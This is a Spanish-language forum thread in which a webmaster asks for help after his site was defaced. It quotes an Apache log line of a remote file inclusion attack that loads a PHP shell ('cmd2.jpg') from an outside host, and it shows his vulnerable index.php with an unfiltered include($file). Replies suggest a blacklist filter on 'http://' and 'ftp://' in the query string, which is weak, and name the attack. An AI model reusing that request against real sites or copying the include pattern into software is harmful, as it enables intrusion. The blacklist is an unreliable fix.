BandaAncha

• 🔍 en 📰 artículos ⏎
  • 🔍 en 💬 foros ⏎
  • 🔍 en 👇 este 💬 foro ⏎
  • 🔍 en 👇 este 💬 tema ⏎
Regístrate Regístrate Identifícate Identifícate

Defaced a mi web

Sylvestre

Esta tarde me han hecho un defaced a la web q administro en mi trabajo (bueno una de mis webs)

Los logs de apache muestran esta linea entre otras muchas del hacker, pero esta es la importante:

200.209.52.2 - - [20/Apr/2005:15:46:04 +0200] "GET /seminario/index.php?file=www.markuswalter.net/lauftreff/cmd2.jpg?…\\index.html HTTP/1.0" 200 10229

La IP q sale es la del hacker, asi q no intenteis nada si creeis q es mi servidor.

Por lo que veo, es que me han colado un script en php (es el cmd2.jpg) a traves del index.php de y luego me han sustituido, el index.html de otra web q esta en otro directorio.

Lo que pasa es que no veo donde esta el fallo en mi index.php (por donde me consiguieron ejecutar el script)

Os pongo el codigo del index.php a ver si alguien me puede ayudar donde esta el fallo

require_once("includes/config.php");

require_once("includes/library.php");

if (empty($file)) {$file=$home_page;}

echo "

\n

\n

";

if (!$printable) {

echo "\n";

header_page(); echo "";

}

echo "\n \n";

if (!$printable) {

echo "\n";

open_menu ($menu3_title,$menu3_folder,$menu3_txt,$menu3_size,$menu3_type); echo "";

open_menu ($menu2_title,$menu2_folder,$menu2_txt,$menu2_size,$menu2_type);

/* echo "

Convalidación por créditos de libre configuración

";*/

echo "

\n

\n

";

open_menu_plane ($menu1_title,$menu1_folder,$menu1_txt,$menu1_size,$menu1_type);

}

if (!$printable) { $view_td="yes"; } else { $view_td="no";}

// Cuerpo de la web.. aqui se hace un include del fichero a mostrar en su hueco correspondiente

if ($view_td=="yes") { // Mostramos o no el enlace Versión Imprimible

$td_print="

Versión imprimible

";

} else {

$td_print="";

}

if (!$menu_name) {$menu_name="$welcome"; $td_print="";}

echo "

";

if (!$table) {

echo "

$menu_name

";

}

echo "

$td_print

";

include($file);

echo "

";

echo "

\n

\n

\n

\n

\n

";

?>

Veo que los echo's no salen, de todas formas no creo que el fallo este en ellos, simplemente contienen html. De todas formas os cuelgo el fichero (link roto)

Gracias

Este tema está cerrado a nuevas respuestas. Abre un nuevo tema para retomar la conversación.
makabro

pon al principio
$url = $_SERVER["QUERY_STRING"];
if (eregi("(http://)|(ftp://)",$url)){
echo"

Que te den

";
die();
}

🗨️ 1
Sylvestre

Gracias.
Algo asi queria hacer mientras encontraba el error.

Pero lo que pasa es que tiene que estar mal en algun sitio, si estuviera bien hecho no hubieran podido entrar.
He leido esto en un foro a otra persona que le ha pasado:

The web-site that got defaced was running an include which included an unescaped GET variable

pero en mi caso creo que este no es mi error ¿o si?

De todas formas parece que el grupo este "Dominus Vis" ha hecho un defaced masivo hoy en muchas webs europeas.

FoSFi

¿¿k version de php corre tu servidor?? Mas que nada que no sea un fallo del mismo php y no de tu codigo en si...

🗨️ 4
Sylvestre

El servidor estaba recien formateado de navidad y lo actualice todo. La version de php es la 5.0.0

🗨️ 3
FoSFi

No me has comentado ke SO corres, pero si tienes windows kiza este enlace te sake de sospechas xD

(link roto)

La ultima parcheada es la 5.0.3, es que esto del software de codigo libre tiene estas cosillas, enseguida salen nuevos bugs, que por consiguiente son parcheados rapidamente ;)

Perdoneme usted, pero creo que este otro enlace, te ayudara muchisimo tambien si miras el script que te subieron al servidor:

securiteam.com/windowsntfocus/6M00K0AC1I

Es el bug del anterior articulo, desarrollado y explicado (en ingles sorry).

🗨️ 2
Sylvestre

Tranquilo por el ingles no tengo ningun problema y gracias.

Si tengo un Windows, el windows XP. Exactamente en el pc esta instalado:

+ apache 2.0.50
+ MYSQL Stable 4.0.20d
+ php 5
+ phpmyadmin 2.6.x

Con el Zone Alarm y el McAfee con sus licencias (son los que tienen la universidad con licencias corporativas) De todas formas puedo instalar cualquier software libre, por si me recomendais alguno que lo sustituya.
Aparte quiero instalar el cygwin, servidor de SSH, el cual ya he trasteado en mi propio pc. Y creo que a parte de FireFox ya no hay ningun otro software.

Bueno se esta haciendo tarde, mañana ya me empollare las webs que me has dado.

Y gracias

🗨️ 1
FoSFi
FoSFi
makabro

es un ataque del tipo file inclusion remote. Fijate en el include que haces, incluye lo que contenga la variable $file, si no la filtras bien se puede incluir un script en otro server externo y lo que sigue por desgracia ia lo conoces.